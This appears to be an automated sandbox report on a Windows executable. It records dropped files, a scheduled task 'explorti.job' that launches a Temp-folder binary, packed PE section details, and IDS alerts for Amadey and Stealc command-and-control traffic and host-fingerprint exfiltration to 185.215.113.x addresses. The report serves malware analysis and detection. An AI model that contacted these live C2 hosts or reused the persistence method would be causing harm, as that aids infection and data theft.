.(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...............................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CLA6EOHWCSIYZJJKSZ5Y.temp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	3888
Entropy (8bit):	3.5282850421585885
Encrypted:	false
SSDEEP:	48:th8EKGTdOPP+isJTrBzBdLXuHGkDpHh82ABfdOPcisJTrBzngdLXuHGk+21:tOI3umkDRfUnIumkz
MD5:	6F2A8B09F9268E9809E0F016E91A42F0
SHA1:	8FB9053EA54D253C9A1A6C99B994A43B77B7FD43
SHA-256:	BD2E2BDC7055357DEACF2E987ECD1A0913D0CA78503A07BF4EB4AB8FF021E238
SHA-512:	7561E5765E88105979DD14FDC817DF6439FBAE21C8C817B06CD40AC2E22FC11F4F8ED3C5EC1AAA6900108FD6570D1D4D58E220FD17C0E93B0DECB84E0DB0E7A9
Malicious:	false
Preview:	...................................FL..................F.@.. .....\|.K......]'....?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....DW.r..PROGRA~2.........O.IDW.r....................V......LU.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....DW.r..MICROS~1..D......(Ux.!Y.#..............................M.i.c.r.o.s.o.f.t.....N.1.....CWaa0.Edge..:.......S8.DWUl...........................s..E.d.g.e.....`.1.....CWaa0.APPLIC~1..H.......S8.!Y.#..............................A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.!Y.#....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j..............j.....C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...............................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HFAXU5KV9RJS8S6GSLD9.temp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	3888
Entropy (8bit):	3.5287658077563
Encrypted:	false
SSDEEP:	48:th8EBfdOPcisJTrBzBdLXuHGkDpHh82ABfdOPcisJTrBzngdLXuHGk+21:tH3umkDRfUnIumkz
MD5:	FF06A9C10362A31D1AF6EC144BFB748A
SHA1:	F2B5B06B278443C738BD2B764D2CA67747BE968D
SHA-256:	64F0987286AB88647E675094E5074066C53C8229A680CD10B4CD20CABACA91CA
SHA-512:	1E25B68D5DF95290381D26943CF410F59A525CA7AD9B1FB37EBD63304470A4C85FC6AF4D7311C95A9BD3A7D4C38A3DCC235EBBEA7351909582884A7B9CA74D6C
Malicious:	false
Preview:	...................................FL..................F.@.. .....\|.K......]'....?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....!Yx#..PROGRA~2.........O.I!Yx#....................V......^..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....DW.r..MICROS~1..D......(Ux.!Y.#..............................M.i.c.r.o.s.o.f.t.....N.1.....CWaa0.Edge..:.......S8.!Y.#...........................s..E.d.g.e.....`.1.....CWaa0.APPLIC~1..H.......S8.!Y.#..............................A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.!Y.#....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j..............j.....C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...............................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	3888
Entropy (8bit):	3.5287658077563
Encrypted:	false
SSDEEP:	48:th8EBfdOPcisJTrBzBdLXuHGkDpHh82ABfdOPcisJTrBzngdLXuHGk+21:tH3umkDRfUnIumkz
MD5:	FF06A9C10362A31D1AF6EC144BFB748A
SHA1:	F2B5B06B278443C738BD2B764D2CA67747BE968D
SHA-256:	64F0987286AB88647E675094E5074066C53C8229A680CD10B4CD20CABACA91CA
SHA-512:	1E25B68D5DF95290381D26943CF410F59A525CA7AD9B1FB37EBD63304470A4C85FC6AF4D7311C95A9BD3A7D4C38A3DCC235EBBEA7351909582884A7B9CA74D6C
Malicious:	false
Preview:	...................................FL..................F.@.. .....\|.K......]'....?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....!Yx#..PROGRA~2.........O.I!Yx#....................V......^..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....DW.r..MICROS~1..D......(Ux.!Y.#..............................M.i.c.r.o.s.o.f.t.....N.1.....CWaa0.Edge..:.......S8.!Y.#...........................s..E.d.g.e.....`.1.....CWaa0.APPLIC~1..H.......S8.!Y.#..............................A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.!Y.#....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j..............j.....C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...............................

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	3.3859131624038703
Encrypted:	false
SSDEEP:	6:ZrSXUG5ZsUEZ+lX1cI1l6lm6tFXqYEp5t/uy0lbEtpt0:ZrgYQ1cagxfXVAtpt0
MD5:	56B327F3B8F678673C22298B2953DAE2
SHA1:	75ADF3663A3D180DB113BB0E3224A538582A24AF
SHA-256:	9634837392FEE4855E0CD1134442E45FED624A3B6456C8FC1BFF924611F4D567
SHA-512:	A166E4211741B261A9936FF1806E651DF02951D2DB1583CBBC58EC0D8860366419BFB8D78AA3C4C9FA3F011496BB75EE9CF3C1BE59E2B469237AFB571E449CDF
Malicious:	false
Preview:	......-...N.Lq..@_.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94898857819984
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'897'472 bytes
MD5:	573679635b5f2712201843ab58c3c313
SHA1:	4df58145fc9034226d108ab2bc3c1c3daf89432e
SHA256:	9bb28003cc59dc408c7eb6ce0acdde2df74fb0e17d0b5abc9e075bde50c90e83
SHA512:	fe783ab248f785f90968f3dc55579c018c7229b35302a0ed1ad4bcf6c67b802496c269a805ab38a13affe01590d14f626c0b063430ba77f6411002049b045204
SSDEEP:	24576:qm6Rswplivqsyvw7qUle/LSzcBS1qWkvcIsVGfFCKD2/jI6iUqjY3Hd5/Zwjd4sD:qm0RL16Ln1gFCv3ewHzDdJ
TLSH:	95953384419B8651E969CCB37427C38D6ABD33F8566F2C6EE9C808F4027F6453F8A593
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8ae000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F0064B7A40Ah
psrld mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F0064B7C405h
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4ac6ac	0x10	mtwfurbd
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4ac65c	0x18	mtwfurbd
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	8a5e52ff1a51c8f87ebd08595cbf7931	False	0.9998505806010929	data	7.978686534287973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	9958787f2e9d4241d6db0f7ed56f002e	False	0.578125	data	4.467728472841594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a4000	0x200	8e34511e6bc5c54af7fca797e78e609d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mtwfurbd	0x30f000	0x19e000	0x19da00	61efbc58e6539a08aa0e5f2f56fd1f3f	False	0.9944268944545179	data	7.953301847590159	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tfjhxtwu	0x4ad000	0x1000	0x600	e7a80c95f4a723a85b3899be53700e44	False	0.587890625	data	5.073316525796577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ae000	0x3000	0x2200	38a995007759d70b98b5cb42db243275	False	0.06502757352941177	DOS executable (COM)	0.7419155484149141	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4ac6bc	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-01T06:28:03.060964+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49704	80	192.168.2.5	185.215.113.19
2024-09-01T06:28:13.541306+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49716	80	192.168.2.5	185.215.113.19
2024-09-01T06:28:10.229553+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49708	80	192.168.2.5	185.215.113.100
2024-09-01T06:28:06.536539+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49704	185.215.113.19	192.168.2.5
2024-09-01T06:28:04.087930+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49705	80	192.168.2.5	185.215.113.16
2024-09-01T06:28:18.895756+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49732	80	192.168.2.5	185.215.113.100
2024-09-01T06:28:07.299173+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49706	80	192.168.2.5	185.215.113.19
2024-09-01T06:28:09.582630+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49709	80	192.168.2.5	185.215.113.19
2024-09-01T06:28:10.743444+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49711	80	192.168.2.5	185.215.113.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 06:27:49.149672985 CEST	49674	443	192.168.2.5	23.1.237.91
Sep 1, 2024 06:27:49.149674892 CEST	49675	443	192.168.2.5	23.1.237.91
Sep 1, 2024 06:27:49.259058952 CEST	49673	443	192.168.2.5	23.1.237.91
Sep 1, 2024 06:27:58.759098053 CEST	49674	443	192.168.2.5	23.1.237.91
Sep 1, 2024 06:27:58.759100914 CEST	49675	443	192.168.2.5	23.1.237.91
Sep 1, 2024 06:27:58.868477106 CEST	49673	443	192.168.2.5	23.1.237.91
Sep 1, 2024 06:28:00.533304930 CEST	443	49703	23.1.237.91	192.168.2.5
Sep 1, 2024 06:28:00.533416986 CEST	49703	443	192.168.2.5	23.1.237.91
Sep 1, 2024 06:28:02.304141045 CEST	49704	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:02.309108019 CEST	80	49704	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:02.309178114 CEST	49704	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:02.309585094 CEST	49704	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:02.315495014 CEST	80	49704	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:03.059550047 CEST	80	49704	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:03.060964108 CEST	49704	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:03.063524008 CEST	49704	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:03.071633101 CEST	80	49704	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:03.325351954 CEST	80	49704	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:03.326606989 CEST	49704	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:03.330521107 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:03.335449934 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:03.338619947 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:03.338871956 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:03.343899012 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.087773085 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.087804079 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.087810993 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.087929964 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.087970018 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.087980986 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.088010073 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.088033915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.088037014 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.088044882 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.088059902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.088063955 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.088072062 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.088078976 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.088083029 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.088088989 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.088108063 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.088125944 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.092803955 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.092859983 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.092869997 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.092870951 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.092900038 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.092914104 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.237760067 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.237775087 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.237786055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.237806082 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.237824917 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.237891912 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.237903118 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.237912893 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.237929106 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.237941980 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.238270044 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.238298893 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.238363981 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.238379955 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.238399029 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.238409042 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.238702059 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.238713980 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.238734007 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.238734961 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.238744020 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.238753080 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.238754988 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.238770008 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.238787889 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.239509106 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.239547014 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.239597082 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.239607096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.239631891 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.239645004 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.239855051 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.239866972 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.239891052 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.239902973 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.240470886 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.240487099 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.240499020 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.240510941 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.240513086 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.240528107 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.240551949 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.242650986 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.242675066 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.242706060 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.242722034 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.242786884 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.242822886 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.387828112 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.387844086 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.387906075 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.388168097 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.388211966 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.388217926 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.388227940 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.388246059 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.388253927 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.388256073 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.388281107 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.388297081 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389350891 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389386892 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389424086 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389436007 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389456987 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389473915 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389480114 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389498949 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389509916 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389511108 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389523029 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389534950 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389553070 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389568090 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389935970 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389945030 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389955044 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389965057 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389965057 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389975071 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.389987946 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.389990091 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390000105 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390006065 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390023947 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390033007 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390058041 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390317917 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390355110 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390381098 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390391111 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390414000 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390429020 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390444994 CEST	80	49705	185.215.113.16	192.168.2.5
